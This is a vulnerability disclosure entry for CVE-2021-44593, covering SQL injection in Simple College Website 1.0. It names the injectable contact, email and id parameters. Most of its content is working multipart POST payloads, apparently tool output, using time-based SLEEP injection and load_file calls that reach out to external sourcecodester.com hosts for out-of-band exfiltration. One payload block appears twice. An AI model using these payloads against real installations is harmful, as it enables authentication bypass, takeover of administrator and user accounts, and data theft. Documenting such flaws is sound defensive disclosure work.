CVE-2021-44593
Software
Vendor
Description:
The Simple College Website 1.0 system is vulnerable to multiple SQL injections by using a bypass authentication in the first stage.
The attacker can exploit and manipulate all accounts of the system plus the administrator's accounts.
The vulnerable parameters are contact, email, and id.
Status: CRITICAL
[+] Payloads:
---
Parameter: MULTIPART email ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------WebKitFormBoundaryfYPr4nvTNDnB74wX
Content-Disposition: form-data; name="name"
Simple College Website
------WebKitFormBoundaryfYPr4nvTNDnB74wX
Content-Disposition: form-data; name="email"
info@sample.comm' AND (SELECT 4393 FROM (SELECT(SLEEP(3)))fUEd) AND 'hsNN'='hsNN
------WebKitFormBoundaryfYPr4nvTNDnB74wX
Content-Disposition: form-data; name="contact"
+6948 8542 623'+(select load_file('\\\\3rveh4nxo0txl4w4nvkmpgek6bc40w0krnff27qw.sourcecodester.com\\ghw'))+'
------WebKitFormBoundaryfYPr4nvTNDnB74wX
Content-Disposition: form-data; name="about"
<p style="text-align: center; background: transparent; position: relative;"><br></p><p style="text-align: ce
---
---
Parameter: MULTIPART email ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------WebKitFormBoundaryfYPr4nvTNDnB74wX
Content-Disposition: form-data; name="name"
Simple College Website
------WebKitFormBoundaryfYPr4nvTNDnB74wX
Content-Disposition: form-data; name="email"
info@sample.comm' AND (SELECT 4393 FROM (SELECT(SLEEP(3)))fUEd) AND 'hsNN'='hsNN
------WebKitFormBoundaryfYPr4nvTNDnB74wX
Content-Disposition: form-data; name="contact"
+6948 8542 623'+(select load_file('\\\\3rveh4nxo0txl4w4nvkmpgek6bc40w0krnff27qw.sourcecodester.com\\ghw'))+'
------WebKitFormBoundaryfYPr4nvTNDnB74wX
Content-Disposition: form-data; name="about"
<p style="text-align: center; background: transparent; position: relative;"><br></p><p style="text-align: ce
---
---
Parameter: MULTIPART id ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------WebKitFormBoundaryQYuBFl6XnXBtfWL5
Content-Disposition: form-data; name="id"
(select load_file('\\\\187cy24v5yav22d24t1k6evin9t2hw5n7bzypme.sourcecodester.com\\gkl')) AND (SELECT 7782 FROM (SELECT(SLEEP(3)))jcgr)
------WebKitFormBoundaryQYuBFl6XnXBtfWL5
Content-Disposition: form-data; name="name"
iEIgvwLH
------WebKitFormBoundaryQYuBFl6XnXBtfWL5--
---
